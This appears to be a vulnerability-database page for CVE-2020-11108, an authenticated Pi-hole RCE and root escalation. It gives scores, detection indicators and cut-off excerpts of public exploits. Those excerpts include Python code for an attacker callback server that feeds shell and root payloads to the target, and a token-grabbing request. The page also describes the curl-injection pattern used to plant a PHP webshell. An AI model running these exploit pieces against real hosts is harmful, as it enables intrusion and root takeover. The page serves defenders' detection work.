CVE-2020-11108
published 2020-05-11CVE-2020-11108: The Gravity updater in Pi-hole through 4.4 allows an authenticated adversary to upload arbitrary files. This can be abused for Remote Code Execution by writing…
PriorityP180high8.8CVSS 3.1
AVNACLPRLUINSUCHIHAH
EXPLOIT
EPSS
78.26%
99.5th percentile
The Gravity updater in Pi-hole through 4.4 allows an authenticated adversary to upload arbitrary files. This can be abused for Remote Code Execution by writing to a PHP file in the web directory. (Also, it can be used in conjunction with the sudo rule for the www-data user to escalate privileges to root.) The code error is in gravity_DownloadBlocklistFromUrl in gravity.sh.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| pi-hole | pi-hole | <= 4.4 | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Detect POST requests to /admin/settings.php?tab=blocklists containing a 'newuserlists' parameter value with curl injection pattern: a URL fragment followed by -o <filename>.php -d to write arbitrary PHP files into the webroot. ↗
- →Detect GET requests to /admin/scripts/pi-hole/php/gravity.sh.php from authenticated sessions, especially in rapid succession (multiple calls within seconds), as this is used to trigger the malicious blocklist download. ↗
- →Alert on GET requests to /admin/scripts/pi-hole/php/fun.php or any random-named .php file under /admin/scripts/pi-hole/php/ that did not previously exist — this is the attacker triggering the dropped webshell. ↗
- →Monitor for unexpected creation or modification of teleporter.php in the Pi-hole web admin directory, as the exploit overwrites it with a root-privilege payload. ↗
- →The exploit requires the attacker-controlled HTTP server to listen on port 80 exactly; detect outbound connections from the Pi-hole host to attacker port 80 during a gravity update as an indicator of exploitation. ↗
- →Look for the Pi-hole admin login followed immediately by blocklist modification (POST to settings.php?tab=blocklists) and then repeated gravity.sh.php calls — this three-phase sequence is the exploit chain. ↗
- ·Exploitation requires authentication to the Pi-hole admin interface; an attacker must have valid credentials (or the interface must be unauthenticated). The PASSWORD option may be blank if no password is set. ↗
- ·The attacker's HTTP server MUST be reachable by the Pi-hole host on port 80 specifically; exploitation fails if SRVPORT is not 80. ↗
- ·The root privilege escalation phase overwrites teleporter.php permanently, breaking that application feature; cleanup of added blocklist entries must be performed manually. ↗
- ·The exploit may require two consecutive gravity update requests to advance through its stages; a single gravity pull may not be sufficient to trigger payload delivery. ↗
CVSS provenance
nvdv3.18.8HIGHCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvdv2.09.0CRITICALAV:N/AC:L/Au:S/C:C/I:C/A:C
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Pi-hole 4.4.0 - Remote Code Execution (Authenticated)
exploitdb·2020-05-26·CVSS 8.8
CVE-2020-11108 [HIGH] Pi-hole 4.4.0 - Remote Code Execution (Authenticated)
Pi-hole 4.4.0 - Remote Code Execution (Authenticated)
---
# Exploit Title: Pi-hole 4.4.0 - Remote Code Execution (Authenticated)
# Date: 2020-05-22
# Exploit Author: Photubias
# Vendor Advisory: [1] https://github.com/pi-hole/AdminLTE
# Version: Pi-hole .
Based (and improved on): https://github.com/Frichetten/CVE-2020-11108-PoC/blob/master/cve-2020-11108-rce.py
File name CVE-2020-11108.py
written by tijl[dot]deneut[at]howest[dot]be for www.ic4.be
## Vulnerable setup instructions (from clean Debian 10-Buster):
> apt update && apt install -y curl
> curl -sSL https://install.pi-hole.net | bash
> pihole checkout web release/v4.3.3
> cd /etc/.pihole/ && git checkout v4.4
> pihole -r ## Select reconfigure
This is a native implementation without requirements, written in Python 3.
Works equa
Exploit-DB
Pi-Hole - heisenbergCompensator Blocklist OS Command Execution (Metasploit)
exploitdb·2020-05-19·CVSS 8.8
CVE-2020-11108 [HIGH] Pi-Hole - heisenbergCompensator Blocklist OS Command Execution (Metasploit)
Pi-Hole - heisenbergCompensator Blocklist OS Command Execution (Metasploit)
---
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule 'Pi-Hole heisenbergCompensator Blocklist OS Command Execution',
'Description' => %q{
This exploits a command execution in Pi-Hole MSF_LICENSE,
'Author' =>
[
'h00die', # msf module
'Nick Frichette' # original PoC, discovery
],
'References' =>
[
['EDB', '48443'],
['EDB', '48442'],
['URL', 'https://frichetten.com/blog/cve-2020-11108-pihole-rce/'],
['URL', 'https://github.com/frichetten/CVE-2020-11108-PoC'],
['CVE', '2020-11108']
],
'Platform' => ['php'],
'Privileged' => true,
'Arch' => ARCH_PHP,
'Targets' =>
[
[ 'Automatic Target', {}]
],
'DisclosureDat
Exploit-DB
Pi-hole < 4.4 - Authenticated Remote Code Execution / Privileges Escalation
exploitdb·2020-05-10
CVE-2020-11108 Pi-hole < 4.4 - Authenticated Remote Code Execution / Privileges Escalation
Pi-hole
""" %(LOCAL_IP, LOCAL_PORT)
root_payload = """
"""
def send_response(thread_name):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind((LOCAL_IP,int(80)))
sock.listen(5)
connected = False
while not connected:
conn,addr = sock.accept()
if thread_name == "T1":
print("[+] Received First Callback")
conn.sendall(b"HTTP/1.1 200 OK\n\nstuff\n")
elif thread_name == "T2":
print("[+] Received Second Callback")
print("[+] Uploading Root Payload")
conn.sendall(bytes(root_payload, "utf-8"))
elif thread_name == "T3":
print("[+] Received Third Callback")
conn.sendall(b"HTTP/1.1 200 OK\n\nstuff\n")
else:
print("[+] Received Fourth Callback")
print("[+] Uploading Shell Payload")
conn.sendall(bytes(shell_payload, "utf-8"))
conn.close()
connected = True
sock.close()
_thread.start_
Exploit-DB
Pi-hole < 4.4 - Authenticated Remote Code Execution
exploitdb·2020-05-10
CVE-2020-11108 Pi-hole < 4.4 - Authenticated Remote Code Execution
Pi-hole
""" %(LOCAL_IP, LOCAL_PORT)
def send_response(thread_name):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind((LOCAL_IP,int(80)))
sock.listen(5)
connected = False
while not connected:
conn,addr = sock.accept()
if thread_name == "T1":
print("[+] Received First Callback")
conn.sendall(b"HTTP/1.1 200 OK\n\nstuff\n")
else:
print("[+] Received Second Callback")
print("[+] Uploading Payload")
conn.sendall(bytes(payload, "utf-8"))
conn.close()
connected = True
sock.close()
_thread.start_new_thread(send_response,("T1",))
# Fetch token
resp = requests.get(TARGET_IP+"/admin/settings.php?tab=blocklists", cookies=SESSION, verify=False)
response = str(resp.content)
token_loc = response.find("name=\"token\"")
token = response[token_loc+20:token_loc+64]
# Make request wit
Metasploit
Pi-Hole heisenbergCompensator Blocklist OS Command Execution
metasploit
Pi-Hole heisenbergCompensator Blocklist OS Command Execution
Pi-Hole heisenbergCompensator Blocklist OS Command Execution
This exploits a command execution in Pi-Hole <= 4.4. A new blocklist is added, and then an update is forced (gravity) to pull in the blocklist content. PHP content is then written to a file within the webroot. Phase 1 writes a sudo pihole command to launch teleporter, effectively running a priv esc. Phase 2 writes our payload to teleporter.php, overwriting, the content. Lastly, the phase 1 PHP file is called in the web root, which launches our payload in teleporter.php with root privileges.
No writeups or analysis indexed.
http://packetstormsecurity.com/files/157623/Pi-hole-4.4-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/157624/Pi-hole-4.4-Remote-Code-Execution-Privilege-Escalation.htmlhttp://packetstormsecurity.com/files/157748/Pi-Hole-heisenbergCompensator-Blocklist-OS-Command-Execution.htmlhttp://packetstormsecurity.com/files/157839/Pi-hole-4.4.0-Remote-Code-Execution.htmlhttps://frichetten.com/blog/cve-2020-11108-pihole-rce/https://github.com/Frichetten/CVE-2020-11108-PoChttp://packetstormsecurity.com/files/157623/Pi-hole-4.4-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/157624/Pi-hole-4.4-Remote-Code-Execution-Privilege-Escalation.htmlhttp://packetstormsecurity.com/files/157748/Pi-Hole-heisenbergCompensator-Blocklist-OS-Command-Execution.htmlhttp://packetstormsecurity.com/files/157839/Pi-hole-4.4.0-Remote-Code-Execution.htmlhttps://frichetten.com/blog/cve-2020-11108-pihole-rce/https://github.com/Frichetten/CVE-2020-11108-PoC
2020-05-11
Published